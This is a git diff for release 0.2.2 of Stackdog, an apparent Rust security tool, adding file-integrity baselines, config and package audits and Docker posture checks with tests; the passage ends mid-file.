diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 65e9855..eb44eb1 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -36,12 +36,14 @@ jobs: run: cargo install cross --git https://github.com/cross-rs/cross - name: Build release binary + env: + CARGO_TARGET_DIR: target-cross run: cross build --release --target ${{ matrix.target }} - name: Package run: | mkdir -p dist - cp target/${{ matrix.target }}/release/stackdog dist/stackdog + cp target-cross/${{ matrix.target }}/release/stackdog dist/stackdog cd dist tar czf ${{ matrix.artifact }}.tar.gz stackdog sha256sum ${{ matrix.artifact }}.tar.gz > ${{ matrix.artifact }}.tar.gz.sha256 diff --git a/.gitignore b/.gitignore index 89b9d61..5ebfe53 100644 --- a/.gitignore +++ b/.gitignore @@ -33,8 +33,7 @@ Cargo.lock # End of https://www.gitignore.io/api/rust,code .idea -<<<<<<< HEAD -======= *.db ->>>>>>> testing docs/tasks/ +web/node_modules/ +web/dist/ diff --git a/CHANGELOG.md b/CHANGELOG.md index 38b1ddc..169152b 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,6 +7,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## [0.2.2] - 2026-04-07 + ### Fixed - **CLI startup robustness** — `.env` loading is now non-fatal. @@ -19,6 +21,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ### Added +- **Expanded detector framework** with additional log-driven detection coverage. + - Reverse shell, sensitive file access, cloud metadata / SSRF, exfiltration chain, and secret leakage detectors. + - file integrity monitoring with SQLite-backed baselines via `STACKDOG_FIM_PATHS`. + - configuration assessment via `STACKDOG_SCA_PATHS`. + - package inventory heuristics via `STACKDOG_PACKAGE_INVENTORY_PATHS`. + - Docker posture audits for privileged mode, host namespaces, dangerous capabilities, Docker socket mounts, and writable sensitive mounts. 
+ +- **Improved syslog ingestion** + - RFC3164 and RFC5424 parsing in file-based log ingestion for cleaner timestamps and normalized message bodies. + #### Log Sniffing & Analysis (`stackdog sniff`) - **CLI Subcommands** — Multi-mode binary with `stackdog serve` and `stackdog sniff` - `--once` flag for single-pass mode @@ -76,6 +88,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Refactored `main.rs` to dispatch `serve`/`sniff` subcommands via clap - Added `events`, `rules`, `alerting`, `models` modules to binary crate - Updated `.env.sample` with `STACKDOG_LOG_SOURCES`, `STACKDOG_AI_*` config vars +- Version metadata updated to `0.2.2` across Cargo, the web package manifest, and current release documentation. ### Testing diff --git a/Cargo.toml b/Cargo.toml index e2e6c0e..85db3ec 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "stackdog" -version = "0.2.1" +version = "0.2.2" authors = ["Vasili Pascal "] edition = "2021" description = "Security platform for Docker containers and Linux servers" @@ -49,6 +49,7 @@ bollard = "0.16" # HTTP client (for LLM API) reqwest = { version = "0.12", default-features = false, features = ["json", "blocking", "rustls-tls"] } +sha2 = "0.10" # Compression zstd = "0.13" diff --git a/DEVELOPMENT.md b/DEVELOPMENT.md index dac5b79..afa725c 100644 --- a/DEVELOPMENT.md +++ b/DEVELOPMENT.md @@ -1,7 +1,7 @@ # Stackdog Security - Development Plan -**Last Updated:** 2026-03-13 -**Current Version:** 0.2.0 +**Last Updated:** 2026-04-07 +**Current Version:** 0.2.2 **Status:** Phase 2 In Progress ## Project Vision diff --git a/README.md b/README.md index 8cf37e7..3d47fc9 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # Stackdog Security -![Version](https://img.shields.io/badge/version-0.2.1-blue.svg) +![Version](https://img.shields.io/badge/version-0.2.2-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) 
![Rust](https://img.shields.io/badge/rust-1.75+-orange.svg) ![Platform](https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows-lightgrey.svg) @@ -19,6 +19,7 @@ - **📊 Real-time Monitoring** — eBPF-based syscall monitoring with minimal overhead (<5% CPU) - **🔍 Log Sniffing** — Discover, read, and AI-summarize logs from containers and system files +- **🧭 Detector Framework** — Rust-native detector registry for web attack heuristics and outbound exfiltration indicators - **🤖 AI/ML Detection** — Candle-powered anomaly detection + OpenAI/Ollama log analysis - **🚨 Alert System** — Multi-channel notifications (Slack, email, webhook) - **🔒 Automated Response** — nftables/iptables firewall, container quarantine @@ -52,7 +53,7 @@ curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | Pin a specific version: ```bash -curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.1 +curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.2 ``` If your repository has no published stable release yet, use `--version` explicitly. 
@@ -179,6 +180,14 @@ cargo run -- sniff --consume --output ./log-archive cargo run -- sniff --sources "/var/log/myapp.log,/opt/service/logs" ``` +The built-in sniff pipeline now includes Rust-native detectors for: + +- web attack indicators such as SQL injection probes, path traversal probes, login brute force, and webshell-style requests +- exfiltration-style indicators such as suspicious SMTP/attachment activity and large outbound transfer hints in logs +- reverse shell behavior, sensitive file access, cloud metadata / SSRF access, exfiltration chains, and secret leakage in logs +- Wazuh-inspired file integrity monitoring for explicit paths configured with `STACKDOG_FIM_PATHS=/etc/ssh/sshd_config,/app/.env` +- Wazuh-inspired configuration assessment via `STACKDOG_SCA_PATHS`, package inventory heuristics via `STACKDOG_PACKAGE_INVENTORY_PATHS`, Docker posture audits, and improved RFC3164/RFC5424 syslog parsing + ### Use as Library Add to your `Cargo.toml`: diff --git a/VERSION.md b/VERSION.md index 0c62199..ee1372d 100644 --- a/VERSION.md +++ b/VERSION.md @@ -1 +1 @@ -0.2.1 +0.2.2 diff --git a/docs/INDEX.md b/docs/INDEX.md index 86c7fed..95e8ebd 100644 --- a/docs/INDEX.md +++ b/docs/INDEX.md @@ -1,7 +1,7 @@ # Stackdog Security - Documentation Index -**Version:** 0.2.0 -**Last Updated:** 2026-03-13 +**Version:** 0.2.2 +**Last Updated:** 2026-04-07 --- diff --git a/install.sh b/install.sh index 514bef4..5cc46f0 100755 --- a/install.sh +++ b/install.sh @@ -3,7 +3,7 @@ # # Usage: # curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -# curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.0 +# curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.2 # # Installs the stackdog binary to /usr/local/bin. # Requires: curl, tar, sha256sum (or shasum), Linux x86_64 or aarch64. 
@@ -73,7 +73,7 @@ resolve_version() { fi if [ -z "$TAG" ]; then - error "Could not determine latest release. Create a GitHub release, or specify one with --version (e.g. --version v0.2.0)." + error "Could not determine latest release. Create a GitHub release, or specify one with --version (e.g. --version v0.2.2)." fi VERSION="$(echo "$TAG" | sed 's/^v//')" @@ -136,7 +136,7 @@ main() { echo "Install stackdog binary to ${INSTALL_DIR}." echo "" echo "Options:" - echo " --version VERSION Install a specific version (e.g. v0.2.0)" + echo " --version VERSION Install a specific version (e.g. v0.2.2)" echo " --help Show this help" exit 0 ;; diff --git a/src/collectors/ebpf/loader.rs b/src/collectors/ebpf/loader.rs index 4ced63f..415070e 100644 --- a/src/collectors/ebpf/loader.rs +++ b/src/collectors/ebpf/loader.rs @@ -4,6 +4,8 @@ //! //! Note: This module is only available on Linux with the ebpf feature enabled +#[cfg(all(target_os = "linux", feature = "ebpf"))] +use anyhow::Context; use anyhow::Result; use std::collections::HashMap; diff --git a/src/collectors/ebpf/syscall_monitor.rs b/src/collectors/ebpf/syscall_monitor.rs index a5d94b1..79b6f40 100644 --- a/src/collectors/ebpf/syscall_monitor.rs +++ b/src/collectors/ebpf/syscall_monitor.rs @@ -6,6 +6,8 @@ use crate::collectors::ebpf::container::ContainerDetector; use crate::collectors::ebpf::enrichment::EventEnricher; use crate::collectors::ebpf::ring_buffer::EventRingBuffer; use crate::events::syscall::SyscallEvent; +#[cfg(all(target_os = "linux", feature = "ebpf"))] +use anyhow::Context; use anyhow::Result; /// Syscall monitor using eBPF diff --git a/src/database/connection.rs b/src/database/connection.rs index e684cfa..98ec13a 100644 --- a/src/database/connection.rs +++ b/src/database/connection.rs @@ -188,6 +188,24 @@ pub fn init_database(pool: &DbPool) -> Result<()> { [], ); + conn.execute( + "CREATE TABLE IF NOT EXISTS file_integrity_baselines ( + path TEXT PRIMARY KEY, + file_type TEXT NOT NULL, + sha256 TEXT NOT 
NULL, + size_bytes INTEGER NOT NULL, + readonly INTEGER NOT NULL, + modified_at INTEGER NOT NULL, + updated_at TEXT NOT NULL + )", + [], + )?; + + let _ = conn.execute( + "CREATE INDEX IF NOT EXISTS idx_file_integrity_updated_at ON file_integrity_baselines(updated_at)", + [], + ); + conn.execute( "CREATE TABLE IF NOT EXISTS ip_offenses ( id TEXT PRIMARY KEY, diff --git a/src/detectors/audits.rs b/src/detectors/audits.rs new file mode 100644 index 0000000..78758da --- /dev/null +++ b/src/detectors/audits.rs @@ -0,0 +1,490 @@ +use std::fs; + +use anyhow::Result; +use serde::{Deserialize, Serialize}; + +use crate::sniff::analyzer::AnomalySeverity; + +use super::{DetectorFamily, DetectorFinding}; + +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +pub struct ContainerPosture { + pub container_id: String, + pub name: String, + pub image: String, + pub privileged: bool, + pub network_mode: Option, + pub pid_mode: Option, + pub cap_add: Vec, + pub mounts: Vec, +} + +#[derive(Debug, Clone, Default)] +pub struct ConfigAssessmentMonitor; + +#[derive(Debug, Clone, Default)] +pub struct PackageInventoryMonitor; + +#[derive(Debug, Clone, Default)] +pub struct DockerPostureMonitor; + +impl ConfigAssessmentMonitor { + pub fn detect(&self, configured_paths: &[String]) -> Result> { + let mut findings = Vec::new(); + let targets = config_paths(configured_paths); + + for path in targets { + let file_name = path + .file_name() + .and_then(|name| name.to_str()) + .unwrap_or_default(); + if !path.exists() { + continue; + } + + let content = match fs::read_to_string(&path) { + Ok(content) => content, + Err(error) => { + log::debug!( + "Skipping unreadable config assessment target {}: {}", + path.display(), + error + ); + continue; + } + }; + let path_str = path.to_string_lossy().into_owned(); + match file_name { + "sshd_config" => findings.extend(check_sshd_config(&path_str, &content)), + "sudoers" => findings.extend(check_sudoers(&path_str, &content)), + "daemon.json" => 
findings.extend(check_docker_daemon_config(&path_str, &content)), + _ => {} + } + } + + Ok(findings) + } +} + +impl PackageInventoryMonitor { + pub fn detect(&self, configured_paths: &[String]) -> Result> { + let mut findings = Vec::new(); + + for path in inventory_paths(configured_paths) { + if !path.exists() { + continue; + } + + let content = match fs::read_to_string(&path) { + Ok(content) => content, + Err(error) => { + log::debug!( + "Skipping unreadable package inventory target {}: {}", + path.display(), + error + ); + continue; + } + }; + let path_str = path.to_string_lossy().into_owned(); + let packages = match path.file_name().and_then(|name| name.to_str()) { + Some("status") => parse_dpkg_status(&content), + Some("installed") => parse_apk_installed(&content), + _ => parse_dpkg_status(&content), + }; + + for (package, version) in packages { + if let Some(finding) = check_package_advisory(&path_str, &package, &version) { + findings.push(finding); + } + } + } + + Ok(findings) + } +} + +impl DockerPostureMonitor { + pub fn detect(&self, postures: &[ContainerPosture]) -> Vec { + let mut findings = Vec::new(); + + for posture in postures { + let mut issues = Vec::new(); + if posture.privileged { + issues.push("privileged mode"); + } + if posture.network_mode.as_deref() == Some("host") { + issues.push("host network"); + } + if posture.pid_mode.as_deref() == Some("host") { + issues.push("host PID namespace"); + } + if posture + .cap_add + .iter() + .any(|cap| matches!(cap.as_str(), "SYS_ADMIN" | "NET_ADMIN" | "SYS_PTRACE")) + { + issues.push("dangerous capabilities"); + } + if posture + .mounts + .iter() + .any(|mount| mount.contains("/var/run/docker.sock")) + { + issues.push("docker socket mount"); + } + if posture.mounts.iter().any(|mount| { + mount.contains("/etc:") && (mount.ends_with(":rw") || !mount.contains(":ro")) + }) { + issues.push("writable /etc mount"); + } + + if issues.is_empty() { + continue; + } + + let severity = if posture.privileged + || 
posture + .mounts + .iter() + .any(|mount| mount.contains("/var/run/docker.sock")) + { + AnomalySeverity::Critical + } else { + AnomalySeverity::High + }; + + findings.push(DetectorFinding { + detector_id: "container.posture-risk".into(), + family: DetectorFamily::Container, + description: format!( + "Container {} has risky posture: {}", + posture.name, + issues.join(", ") + ), + severity, + confidence: 90, + sample_line: format!("{} ({})", posture.name, posture.container_id), + }); + } + + findings + } +} + +fn config_paths(configured_paths: &[String]) -> Vec { + if configured_paths.is_empty() { + default_existing_paths(&[ + "/etc/ssh/sshd_config", + "/etc/sudoers", + "/etc/docker/daemon.json", + ]) + } else { + configured_paths + .iter() + .map(std::path::PathBuf::from) + .collect() + } +} + +fn inventory_paths(configured_paths: &[String]) -> Vec { + if configured_paths.is_empty() { + default_existing_paths(&["/var/lib/dpkg/status", "/lib/apk/db/installed"]) + } else { + configured_paths + .iter() + .map(std::path::PathBuf::from) + .collect() + } +} + +fn default_existing_paths(paths: &[&str]) -> Vec { + paths + .iter() + .map(std::path::PathBuf::from) + .filter(|path| path.exists()) + .collect() +} + +fn check_sshd_config(path: &str, content: &str) -> Vec { + let mut findings = Vec::new(); + let normalized = uncommented_lines(content); + + if normalized + .iter() + .any(|line| line.eq_ignore_ascii_case("PermitRootLogin yes")) + { + findings.push(DetectorFinding { + detector_id: "config.ssh-root-login".into(), + family: DetectorFamily::Configuration, + description: format!("sshd_config allows direct root login: {}", path), + severity: AnomalySeverity::High, + confidence: 92, + sample_line: path.into(), + }); + } + + if normalized + .iter() + .any(|line| line.eq_ignore_ascii_case("PasswordAuthentication yes")) + { + findings.push(DetectorFinding { + detector_id: "config.ssh-password-auth".into(), + family: DetectorFamily::Configuration, + description: 
format!("sshd_config enables password authentication: {}", path), + severity: AnomalySeverity::Medium, + confidence: 84, + sample_line: path.into(), + }); + } + + findings +} + +fn check_sudoers(path: &str, content: &str) -> Vec { + uncommented_lines(content) + .iter() + .filter(|line| line.contains("NOPASSWD: ALL")) + .map(|_| DetectorFinding { + detector_id: "config.sudoers-nopasswd".into(), + family: DetectorFamily::Configuration, + description: format!("sudoers grants passwordless full sudo access: {}", path), + severity: AnomalySeverity::High, + confidence: 91, + sample_line: path.into(), + }) + .collect() +} + +fn check_docker_daemon_config(path: &str, content: &str) -> Vec { + let mut findings = Vec::new(); + + let parsed = match serde_json::from_str::(content) { + Ok(value) => value, + Err(_) => { + findings.push(DetectorFinding { + detector_id: "config.docker-invalid-json".into(), + family: DetectorFamily::Configuration, + description: format!("Docker daemon config is not valid JSON: {}", path), + severity: AnomalySeverity::Medium, + confidence: 80, + sample_line: path.into(), + }); + return findings; + } + }; + + if parsed + .get("icc") + .and_then(|value| value.as_bool()) + .unwrap_or(true) + { + findings.push(DetectorFinding { + detector_id: "config.docker-icc".into(), + family: DetectorFamily::Configuration, + description: format!( + "Docker daemon config allows inter-container communication: {}", + path + ), + severity: AnomalySeverity::Medium, + confidence: 82, + sample_line: path.into(), + }); + } + + if parsed.get("userns-remap").is_none() { + findings.push(DetectorFinding { + detector_id: "config.docker-userns".into(), + family: DetectorFamily::Configuration, + description: format!( + "Docker daemon config does not enable user namespace remapping: {}", + path + ), + severity: AnomalySeverity::Medium, + confidence: 78, + sample_line: path.into(), + }); + } + + findings +} + +fn uncommented_lines(content: &str) -> Vec { + content + .lines() + 
.map(str::trim) + .filter(|line| !line.is_empty() && !line.starts_with('#')) + .map(ToString::to_string) + .collect() +} + +fn parse_dpkg_status(content: &str) -> Vec<(String, String)> { + let mut packages = Vec::new(); + + for stanza in content.split("\n\n") { + let mut package = None; + let mut version = None; + + for line in stanza.lines() { + if let Some(value) = line.strip_prefix("Package: ") { + package = Some(value.trim().to_string()); + } else if let Some(value) = line.strip_prefix("Version: ") { + version = Some(value.trim().to_string()); + } + } + + if let (Some(package), Some(version)) = (package, version) { + packages.push((package, version)); + } + } + + packages +} + +fn parse_apk_installed(content: &str) -> Vec<(String, String)> { + let mut packages = Vec::new(); + let mut package = None; + let mut version = None; + + for line in content.lines() { + if let Some(value) = line.strip_prefix("P:") { + package = Some(value.trim().to_string()); + } else if let Some(value) = line.strip_prefix("V:") { + version = Some(value.trim().to_string()); + } else if line.trim().is_empty() { + if let (Some(package), Some(version)) = (package.take(), version.take()) { + packages.push((package, version)); + } + } + } + + if let (Some(package), Some(version)) = (package, version) { + packages.push((package, version)); + } + + packages +} + +fn check_package_advisory(path: &str, package: &str, version: &str) -> Option { + let advisories: [(&str, &[&str], AnomalySeverity); 4] = [ + ("openssl", &["1.0.", "1.1.0"], AnomalySeverity::High), + ( + "openssh-server", + &["7.", "8.0", "8.1"], + AnomalySeverity::High, + ), + ("sudo", &["1.8."], AnomalySeverity::Medium), + ("bash", &["4.3"], AnomalySeverity::Medium), + ]; + + advisories + .into_iter() + .find_map(|(name, risky_prefixes, severity)| { + (package == name + && risky_prefixes + .iter() + .any(|prefix| version.starts_with(prefix))) + .then(|| DetectorFinding { + detector_id: "vuln.legacy-package".into(), + family: 
DetectorFamily::Vulnerability, + description: format!( + "Legacy package version detected in {}: {} {}", + path, package, version + ), + severity, + confidence: 83, + sample_line: format!("{} {}", package, version), + }) + }) +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashSet; + + #[test] + fn test_config_assessment_detects_insecure_sshd_and_sudoers() { + let dir = tempfile::tempdir().unwrap(); + let sshd = dir.path().join("sshd_config"); + let sudoers = dir.path().join("sudoers"); + fs::write(&sshd, "PermitRootLogin yes\nPasswordAuthentication yes\n").unwrap(); + fs::write(&sudoers, "admin ALL=(ALL) NOPASSWD: ALL\n").unwrap(); + + let monitor = ConfigAssessmentMonitor; + let findings = monitor + .detect(&[ + sshd.to_string_lossy().into_owned(), + sudoers.to_string_lossy().into_owned(), + ]) + .unwrap(); + + let ids = findings + .iter() + .map(|finding| finding.detector_id.as_str()) + .collect::>(); + assert!(ids.contains("config.ssh-root-login")); + assert!(ids.contains("config.ssh-password-auth")); + assert!(ids.contains("config.sudoers-nopasswd")); + } + + #[test] + fn test_config_assessment_detects_docker_daemon_gaps() { + let dir = tempfile::tempdir().unwrap(); + let daemon = dir.path().join("daemon.json"); + fs::write(&daemon, r#"{"icc": true}"#).unwrap(); + + let monitor = ConfigAssessmentMonitor; + let findings = monitor + .detect(&[daemon.to_string_lossy().into_owned()]) + .unwrap(); + + let ids = findings + .iter() + .map(|finding| finding.detector_id.as_str()) + .collect::>(); + assert!(ids.contains("config.docker-icc")); + assert!(ids.contains("config.docker-userns")); + } + + #[test] + fn test_package_inventory_detects_legacy_versions() { + let dir = tempfile::tempdir().unwrap(); + let status = dir.path().join("status"); + fs::write( + &status, + "Package: openssl\nVersion: 1.0.2u-1\n\nPackage: sudo\nVersion: 1.8.31-1\n", + ) + .unwrap(); + + let monitor = PackageInventoryMonitor; + let findings = monitor + 
.detect(&[status.to_string_lossy().into_owned()]) + .unwrap(); + + assert_eq!(findings.len(), 2); + assert!(findings + .iter() + .all(|finding| finding.detector_id == "vuln.legacy-package")); + } + + #[test] + fn test_docker_posture_monitor_summarizes_risky_container_settings() { + let monitor = DockerPostureMonitor; + let findings = monitor.detect(&[ContainerPosture { + container_id: "abc123".into(), + name: "web".into(), + image: "nginx:latest".into(), + privileged: true, + network_mode: Some("host".into()), + pid_mode: Some("host".into()), + cap_add: vec!["SYS_ADMIN".into()], + mounts: vec!["/var/run/docker.sock:/var/run/docker.sock:rw".into()], + }]); + + assert_eq!(findings.len(), 1); + assert_eq!(findings[0].detector_id, "container.posture-risk"); + assert_eq!(findings[0].family, DetectorFamily::Container); + assert!(findings[0].description.contains("privileged mode")); + } +} diff --git a/src/detectors/integrity.rs b/src/detectors/integrity.rs new file mode 100644 index 0000000..21111cd --- /dev/null +++ b/src/detectors/integrity.rs @@ -0,0 +1,393 @@ +use std::collections::HashMap; +use std::fs; +use std::io::{ErrorKind, Read}; +use std::path::{Path, PathBuf}; +use std::time::UNIX_EPOCH; + +use anyhow::{Context, Result}; +use chrono::Utc; +use rusqlite::params; +use sha2::{Digest, Sha256}; + +use crate::database::connection::DbPool; +use crate::sniff::analyzer::AnomalySeverity; + +use super::{DetectorFamily, DetectorFinding}; + +const DETECTOR_ID: &str = "integrity.file-baseline"; + +#[derive(Debug, Clone, Default)] +pub struct FileIntegrityMonitor; + +#[derive(Debug, Clone)] +struct FileSnapshot { + path: String, + file_type: String, + sha256: String, + size_bytes: u64, + readonly: bool, + modified_at: i64, +} + +impl FileIntegrityMonitor { + pub fn detect(&self, pool: &DbPool, paths: &[String]) -> Result> { + if paths.is_empty() { + return Ok(Vec::new()); + } + + let scopes = normalize_scopes(paths)?; + let previous = load_snapshots(pool, &scopes)?; + let 
current = collect_snapshots(&scopes)?; + let findings = diff_snapshots(&scopes, &previous, ¤t); + + persist_snapshots(pool, ¤t, &previous)?; + + Ok(findings) + } +} + +fn normalize_scopes(paths: &[String]) -> Result> { + let current_dir = std::env::current_dir().context("Failed to read current directory")?; + let mut scopes = Vec::new(); + + for path in paths { + let trimmed = path.trim(); + if trimmed.is_empty() { + continue; + } + + let candidate = PathBuf::from(trimmed); + let normalized = if candidate.exists() { + candidate.canonicalize().with_context(|| { + format!( + "Failed to canonicalize integrity path {}", + candidate.display() + ) + })? + } else if candidate.is_absolute() { + candidate + } else { + current_dir.join(candidate) + }; + + if !scopes.iter().any(|existing| existing == &normalized) { + scopes.push(normalized); + } + } + + Ok(scopes) +} + +fn load_snapshots(pool: &DbPool, scopes: &[PathBuf]) -> Result> { + let conn = pool.get()?; + let mut stmt = conn.prepare( + "SELECT path, file_type, sha256, size_bytes, readonly, modified_at + FROM file_integrity_baselines", + )?; + let rows = stmt.query_map([], |row| { + Ok(FileSnapshot { + path: row.get(0)?, + file_type: row.get(1)?, + sha256: row.get(2)?, + size_bytes: row.get::<_, i64>(3)? as u64, + readonly: row.get::<_, i64>(4)? 
!= 0, + modified_at: row.get(5)?, + }) + })?; + + let mut snapshots = HashMap::new(); + for row in rows { + let snapshot = row?; + if scopes + .iter() + .any(|scope| path_is_within_scope(&snapshot.path, scope)) + { + snapshots.insert(snapshot.path.clone(), snapshot); + } + } + + Ok(snapshots) +} + +fn collect_snapshots(scopes: &[PathBuf]) -> Result> { + let mut snapshots = HashMap::new(); + + for scope in scopes { + collect_path(scope, &mut snapshots)?; + } + + Ok(snapshots) +} + +fn collect_path(path: &Path, snapshots: &mut HashMap) -> Result<()> { + let metadata = match fs::symlink_metadata(path) { + Ok(metadata) => metadata, + Err(error) if error.kind() == ErrorKind::NotFound => return Ok(()), + Err(error) => { + return Err(error) + .with_context(|| format!("Failed to inspect integrity path {}", path.display())); + } + }; + + if metadata.file_type().is_symlink() { + return Ok(()); + } + + if metadata.is_dir() { + let mut entries = fs::read_dir(path)? + .collect::, _>>() + .with_context(|| format!("Failed to read integrity directory {}", path.display()))?; + entries.sort_by_key(|entry| entry.path()); + + for entry in entries { + collect_path(&entry.path(), snapshots)?; + } + + return Ok(()); + } + + if metadata.is_file() { + let snapshot = snapshot_file(path, &metadata)?; + snapshots.insert(snapshot.path.clone(), snapshot); + } + + Ok(()) +} + +fn snapshot_file(path: &Path, metadata: &fs::Metadata) -> Result { + let mut file = fs::File::open(path) + .with_context(|| format!("Failed to open monitored file {}", path.display()))?; + let mut hasher = Sha256::new(); + let mut buffer = [0_u8; 8192]; + + loop { + let read = file + .read(&mut buffer) + .with_context(|| format!("Failed to hash monitored file {}", path.display()))?; + if read == 0 { + break; + } + hasher.update(&buffer[..read]); + } + + let modified_at = metadata + .modified() + .ok() + .and_then(|time| time.duration_since(UNIX_EPOCH).ok()) + .map(|duration| duration.as_secs() as i64) + .unwrap_or(0); + 
let normalized_path = path + .canonicalize() + .unwrap_or_else(|_| path.to_path_buf()) + .to_string_lossy() + .into_owned(); + + Ok(FileSnapshot { + path: normalized_path, + file_type: "file".into(), + sha256: format!("{:x}", hasher.finalize()), + size_bytes: metadata.len(), + readonly: metadata.permissions().readonly(), + modified_at, + }) +} + +fn diff_snapshots( + scopes: &[PathBuf], + previous: &HashMap, + current: &HashMap, +) -> Vec { + let mut findings = Vec::new(); + + for (path, snapshot) in current { + match previous.get(path) { + Some(before) => { + if let Some(finding) = compare_snapshot(before, snapshot) { + findings.push(finding); + } + } + None if scope_has_baseline(path, scopes, previous) => findings.push(DetectorFinding { + detector_id: DETECTOR_ID.into(), + family: DetectorFamily::Integrity, + description: format!("New file observed in monitored integrity path: {}", path), + severity: AnomalySeverity::Medium, + confidence: 79, + sample_line: path.clone(), + }), + None => {} + } + } + + for path in previous.keys() { + if !current.contains_key(path) { + findings.push(DetectorFinding { + detector_id: DETECTOR_ID.into(), + family: DetectorFamily::Integrity, + description: format!("Previously monitored file is missing: {}", path), + severity: AnomalySeverity::High, + confidence: 88, + sample_line: path.clone(), + }); + } + } + + findings.sort_by(|left, right| left.sample_line.cmp(&right.sample_line)); + findings +} + +fn compare_snapshot(previous: &FileSnapshot, current: &FileSnapshot) -> Option { + let mut drift = Vec::new(); + + if previous.file_type != current.file_type { + drift.push("type"); + } + if previous.sha256 != current.sha256 { + drift.push("content"); + } + if previous.size_bytes != current.size_bytes { + drift.push("size"); + } + if previous.readonly != current.readonly { + drift.push("permissions"); + } + if previous.modified_at == 0 && current.modified_at != 0 { + drift.push("modified_time"); + } + + if drift.is_empty() { + return 
/// Reports whether `path` is the scope itself or lies somewhere beneath it.
///
/// The check is purely textual. Trailing `/` characters on the scope are ignored,
/// and a match must end exactly at the scope or at a `/` boundary, so a scope of
/// `/etc/app` does not claim `/etc/application`.
fn path_is_within_scope(path: &str, scope: &Path) -> bool {
    let scope_text = scope.to_string_lossy();
    let prefix = scope_text.trim_end_matches('/');

    match path.strip_prefix(prefix) {
        Some(remainder) => remainder.is_empty() || remainder.starts_with('/'),
        None => false,
    }
}
init_database}; + + #[test] + fn test_file_integrity_monitor_detects_content_drift() { + let dir = tempfile::tempdir().unwrap(); + let monitored = dir.path().join("app.env"); + fs::write(&monitored, "API_KEY=first").unwrap(); + + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + let monitor = FileIntegrityMonitor; + let paths = vec![monitored.to_string_lossy().into_owned()]; + + let initial = monitor.detect(&pool, &paths).unwrap(); + assert!(initial.is_empty()); + + fs::write(&monitored, "API_KEY=second").unwrap(); + + let findings = monitor.detect(&pool, &paths).unwrap(); + assert_eq!(findings.len(), 1); + assert_eq!(findings[0].detector_id, DETECTOR_ID); + assert!(findings[0].description.contains("File integrity drift")); + } + + #[test] + fn test_file_integrity_monitor_detects_new_file_in_monitored_directory() { + let dir = tempfile::tempdir().unwrap(); + let existing = dir.path().join("existing.conf"); + fs::write(&existing, "setting=true").unwrap(); + + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + let monitor = FileIntegrityMonitor; + let paths = vec![dir.path().to_string_lossy().into_owned()]; + + let initial = monitor.detect(&pool, &paths).unwrap(); + assert!(initial.is_empty()); + + let added = dir.path().join("added.conf"); + fs::write(&added, "setting=false").unwrap(); + + let findings = monitor.detect(&pool, &paths).unwrap(); + assert_eq!(findings.len(), 1); + assert!(findings[0].description.contains("New file observed")); + assert_eq!( + findings[0].sample_line, + added.canonicalize().unwrap().to_string_lossy().into_owned() + ); + } +} diff --git a/src/detectors/mod.rs b/src/detectors/mod.rs new file mode 100644 index 0000000..a32c54f --- /dev/null +++ b/src/detectors/mod.rs @@ -0,0 +1,849 @@ +//! Detector framework with built-in log, integrity, and audit detectors. +//! +//! This is the first step toward a larger detector platform: a small registry +//! 
that can run built-in detectors over log entries and emit structured +//! anomalies that flow through the existing sniff/reporting pipeline. + +mod audits; +mod integrity; + +use std::collections::HashSet; + +use anyhow::Result; +use serde::{Deserialize, Serialize}; + +pub use self::audits::ContainerPosture; + +use self::audits::{ConfigAssessmentMonitor, DockerPostureMonitor, PackageInventoryMonitor}; +use self::integrity::FileIntegrityMonitor; +use crate::database::connection::DbPool; +use crate::sniff::analyzer::{AnomalySeverity, LogAnomaly}; +use crate::sniff::reader::LogEntry; + +/// High-level detector families that can be surfaced in alerts and APIs. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +pub enum DetectorFamily { + Web, + Exfiltration, + Execution, + FileAccess, + Integrity, + Configuration, + Container, + Vulnerability, + Cloud, + Secrets, +} + +impl std::fmt::Display for DetectorFamily { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + DetectorFamily::Web => write!(f, "Web"), + DetectorFamily::Exfiltration => write!(f, "Exfiltration"), + DetectorFamily::Execution => write!(f, "Execution"), + DetectorFamily::FileAccess => write!(f, "FileAccess"), + DetectorFamily::Integrity => write!(f, "Integrity"), + DetectorFamily::Configuration => write!(f, "Configuration"), + DetectorFamily::Container => write!(f, "Container"), + DetectorFamily::Vulnerability => write!(f, "Vulnerability"), + DetectorFamily::Cloud => write!(f, "Cloud"), + DetectorFamily::Secrets => write!(f, "Secrets"), + } + } +} + +/// Structured finding emitted by a detector before being converted to a log anomaly. 
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct DetectorFinding {
    /// Identifier of the detector that raised the finding.
    pub detector_id: String,
    /// Detector family the finding belongs to.
    pub family: DetectorFamily,
    /// Human-readable explanation of what was detected.
    pub description: String,
    /// Severity assigned by the detector.
    pub severity: AnomalySeverity,
    /// Confidence score assigned by the detector.
    // NOTE(review): presumably a 0-100 percentage; the type only bounds it to 0..=255 — confirm.
    pub confidence: u8,
    /// Sample text that becomes the anomaly's `sample_line`.
    pub sample_line: String,
}

impl DetectorFinding {
